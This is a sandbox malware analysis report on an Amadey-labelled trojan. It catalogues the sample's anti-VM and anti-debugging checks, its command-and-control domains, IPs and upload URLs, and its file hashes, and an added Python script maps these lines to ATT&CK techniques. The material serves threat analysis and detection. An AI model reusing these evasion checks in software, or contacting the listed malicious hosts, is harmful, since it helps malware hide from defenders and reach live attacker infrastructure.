Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Special instruction interceptor: First address: 16C28B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00F39980 rdtsc 0_2_00F39980
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe TID: 7824 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D529FF
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
Source: Yda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Yda6AxtlVP.exe, 00000000.00000003.1345742967.0000000006D11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=Y
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Yda6AxtlVP.exe | Binary or memory string: Hyper-V RAW
Source: Yda6AxtlVP.exe, 00000000.00000002.1452550089.0000000001D7F000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420543487.0000000001D7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldz
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Yda6AxtlVP.exe, 00000000.00000003.1343992663.0000000001D03000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File opened: NTICE
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File opened: SICE
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00F39980 rdtsc 0_2_00F39980
Source: Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: rProgram Manager
Source: Yda6AxtlVP.exe | Binary or memory string: P7rProgram Manager
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
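The anti-VM and anti-debugging evidence above is a flat list of API-level observations; what an analyst needs from it is which Windows mechanism each line implies and how much weight each technique carries. The following added example (not part of the Joe Sandbox report and not code from the sample) is a small rule table that does that triage over the report's own lines: ThreadHideFromDebugger and ProcessDebugPort are the NtSetInformationThread / NtQueryInformationProcess checks, the NTICE/SICE/SIWVID opens are SoftICE device names, {4d36e968-e325-11ce-bfc1-08002be10318} is the display-adapter class GUID whose DriverDesc names the hypervisor's video driver, and the VBOX__ / VBoxSF / Oreans strings are matched as literal substrings. The ATT&CK assignments, the rule set and the (partly truncated) copies of the report lines used as input are this example's own construction; the MachineGuid read is deliberately not covered, because the rules describe only evasion.

```python
"""Triage of the anti-analysis lines in this report.

Added example; not part of the Joe Sandbox report and not code from the
sample. The rule table, its ATT&CK assignments and the truncated copies of
the report lines below are this example's own construction.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# (regex over the report line, mechanism it implies, ATT&CK technique id)
RULES: List[Tuple[str, str, str]] = [
    (r"Thread information set: HideFromDebugger",
     "NtSetInformationThread(ThreadHideFromDebugger=0x11): debugger stops receiving this thread's events", "T1622"),
    (r"Process queried: DebugPort",
     "NtQueryInformationProcess(ProcessDebugPort=7): non-zero means a debugger is attached", "T1622"),
    (r"File opened: (NTICE|SICE|SIWVID)\b",
     r"CreateFile on the \\.\NTICE, \\.\SICE, \\.\SIWVID SoftICE device names", "T1622"),
    (r"Open window title or class name: .*(ollydbg|gbdyllo)",
     "FindWindow for the OllyDbg window class", "T1622"),
    (r"Open window title or class name: .*(procmon|regmon|filemon|process monitor|registry monitor|file monitor)",
     "FindWindow for Sysinternals Process/Registry/File Monitor", "T1518.001"),
    (r"Binary or memory string: .*(procmon\.exe|wireshark\.exe|x64dbg\.exe|ida\.exe|WINDBG\.EXE)",
     "tool-name list compared against the running process list", "T1518.001"),
    (r"Registry key queried: .*\\Class\\\{4d36e968-e325-11ce-bfc1-08002be10318\}.*DriverDesc",
     "display-adapter class GUID: DriverDesc names the hypervisor's video driver", "T1497.001"),
    (r"Registry key queried: .*HARDWARE\\DESCRIPTION\\System name: (SystemBiosVersion|VideoBiosVersion)",
     "BIOS version strings carry the hypervisor vendor name", "T1497.001"),
    (r"Binary or memory string: .*(VBOX__|VBoxSF|VBox\*\.dll)",
     "VirtualBox ACPI table, shared-folder service and guest DLL names", "T1497.001"),
    (r"\brdtsc\b", "RDTSC delta timing", "T1497.003"),
    (r"Thread sleep time", "Sleep before acting, to outlast short sandbox runs", "T1497.003"),
    (r"Binary or memory string: .*(Oreans\.vxd|WinLicense)",
     "Oreans WinLicense protector strings", "T1027.002"),
]

# Constructed input: the behaviour lines of this report with the "Source:" column
# stripped; the two long memory strings are copied as they appear on the page.
REPORT_LINES: List[str] = [
    r"Thread information set: HideFromDebugger",
    r"Open window title or class name: regmonclass",
    r"Open window title or class name: gbdyllo",
    r"Open window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Open window title or class name: procmon_window_class",
    r"Open window title or class name: registry monitor - sysinternals: www.sysinternals.com",
    r"Open window title or class name: ollydbg",
    r"Open window title or class name: filemonclass",
    r"Open window title or class name: file monitor - sysinternals: www.sysinternals.com",
    r"File opened: NTICE",
    r"File opened: SICE",
    r"File opened: SIWVID",
    r"Process queried: DebugPort",
    r"Process queried: DebugPort",
    r"Process queried: DebugPort",
    r"Code function: 0_2_00F39980 rdtsc 0_2_00F39980",
    r"Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc",
    r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion",
    r"Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF",
    r"Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.",
    r"Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicense",
    r"Binary or memory string: procmon.exe",
    r"Binary or memory string: wireshark.exe",
    r"TID: 7824 Thread sleep time: -30000s >= -30000s",
    r"Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
]


def triage(lines: List[str]) -> Tuple[Dict[str, List[Tuple[str, str]]], List[str]]:
    """Return {technique_id: [(mechanism, line), ...]} plus the lines no rule explains.
    A line may support several techniques (the SYSINTERNALS blob names both
    VirtualBox artefacts and analysis tools)."""
    hits: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    unmatched: List[str] = []
    for line in lines:
        matched = False
        for pattern, mechanism, tid in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                hits[tid].append((mechanism, line))
                matched = True
        if not matched:
            unmatched.append(line)
    return dict(hits), unmatched


def summary(lines: List[str]) -> Tuple[Dict[str, int], int]:
    """Evidence count per technique id, and how many lines were left unexplained."""
    hits, unmatched = triage(lines)
    return {tid: len(ev) for tid, ev in sorted(hits.items())}, len(unmatched)


if __name__ == "__main__":
    counts, leftover = summary(REPORT_LINES)
    for tid, n in counts.items():
        print(f"{tid:10s} {n:3d} lines")
    print("unexplained:", leftover)
```

Run against the report's lines the table yields nine debugger-evasion observations (T1622), nine analysis-tool lookups (T1518.001), seven hypervisor fingerprints (T1497.001), two timing checks (T1497.003) and one packer indicator (T1027.002). The SYSINTERNALS string is worth reading on its own: its field names (vbox_first, vbox_second, dbg, dbg_sec, dbg_third, public_check, recent_files, uptime_minutes) are the sample's own result keys for these checks, which is why it lands in two technique buckets.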

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49716 -> 185.121.15.192:80
MITRE ATT&CK matrix. A number in front of a technique is the count of matched signatures for that technique; techniques without a number did not match and appear only as matrix context.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
Yda6AxtlVP.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
Yda6AxtlVP.exe | 65% | Virustotal | -
Yda6AxtlVP.exe | 100% | Avira | TR/Crypt.TPM.Gen
Yda6AxtlVP.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5sb.top | 185.121.15.192 | true | false | - | high
httpbin.org | 34.226.108.155 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://httpbin.org/ip | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://html4/loose.dtd | Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/alt-svc.html# | Yda6AxtlVP.exe | false | - | high
https://httpbin.org/ipbefore | Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fivetk5sb.top/niCGME_ | Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://curl.se/docs/alt-svc.html | Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/http-cookies.html | Yda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://.css | Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://.jpg | Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/hsts.html# | Yda6AxtlVP.exe | false | - | high
http://home.fivetk5sb.top/niCGM | Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.fivetk5sb.top | Spain (ES) | 207046 | REDSERVICIO | false
34.226.108.155 | httpbin.org | United States (US) | 14618 | AMAZON-AES | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1579641
                              Start date and time:2024-12-23 06:53:58 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 54s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Yda6AxtlVP.exe
                              renamed because original name is a hash value
                              Original Sample Name:339948cf14bfed6a4e1cd717beeb9fff.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:55:00 | API Interceptor | 3x Sleep call for process: Yda6AxtlVP.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.121.15.192 | 2OJYjm4J1B.exe | Get hash | malicious | Unknown | Browse
• home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
 | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
 | 5wgTw8pA13.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
 | bwyUxrKbYN.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• fivetk5sb.top/v1/upload.php
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
• twentytk20ht.top/v1/upload.php
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
• home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
• fivetk5ht.top/v1/upload.php
34.226.108.155 | 2OJYjm4J1B.exe | Get hash | malicious | Unknown | Browse
 | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm | Browse
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
 | Set-up.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
httpbin.org | 2OJYjm4J1B.exe | Get hash | malicious | Unknown | Browse
• 34.226.108.155
 | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 34.226.108.155
 | 5wgTw8pA13.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
 | bwyUxrKbYN.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
 | jDSFvyBr1P.exe | Get hash | malicious | Unknown | Browse
• 98.85.100.80
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 98.85.100.80
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
• 34.226.108.155
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• 34.226.108.155
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• 98.85.100.80
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse
• 34.226.108.155
home.fivetk5sb.top | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.121.15.192
 | bwyUxrKbYN.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 185.121.15.192
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
REDSERVICIOES | 2OJYjm4J1B.exe | Get hash | malicious | Unknown | Browse
• 185.121.15.192
 | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.121.15.192
 | 5wgTw8pA13.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.121.15.192
 | bwyUxrKbYN.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse
• 185.121.15.192
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse
• 185.121.15.192
AMAZON-AESUS | 2OJYjm4J1B.exe | Get hash | malicious | Unknown | Browse
• 34.226.108.155
 | ze38hsiGOb.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 34.226.108.155
 | armv4l.elf | Get hash | malicious | Unknown | Browse
• 54.88.200.107
 | loligang.sh4.elf | Get hash | malicious | Mirai | Browse
• 54.137.103.116
 | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse
• 54.136.31.230
 | arm5.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 54.2.45.144
 | sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 3.243.200.233
 | x86_64.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 3.242.220.133
 | mips.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 34.201.15.152
 | spc.elf | Get hash | malicious | Mirai, Moobot | Browse
• 44.205.162.242
                                                  No context
                                                  No context
                                                  No created / dropped files found
                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.984874267657509
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:Yda6AxtlVP.exe
                                                  File size:4'534'272 bytes
                                                  MD5:339948cf14bfed6a4e1cd717beeb9fff
                                                  SHA1:5579437dde79a533dd625fb7fb1ccdb6226e3364
                                                  SHA256:6eb9cd9fe518bd6649b3db9de8478d7e8570fa22272b111a76c491749e049994
                                                  SHA512:483ee1fcd7ac2262e90feb4bf38a7a11a4f76a77d577cda49fb0e6ddf30db36f33819af2dced92d7af156fc25132878cd2b69fe4e210698562990e80ff1f4733
                                                  SSDEEP:49152:I2c+UqRHoBg+InSsYjp0UE2fHvc/IMqDwU8PU+WKOUSjJSU1lSINnjnwcLH3bsAn:Dc+Uq2/IVyqUigjDLbSIxwPD6Ew
                                                  TLSH:082633D20A1A08B3D89B3933C3AA8D972D3DCFB545DD094DF630879A1D1AD9B3275C98
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fg...............(..N...t..2...@........N...@..........................p......HKE...@... ............................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x1094000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                  DLL Characteristics:DYNAMIC_BASE
                                                  Time Stamp:0x6766E7C6 [Sat Dec 21 16:07:34 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                  Instruction
                                                  jmp 00007F9664C04EFAh
                                                  femms
                                                  inc ebp
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
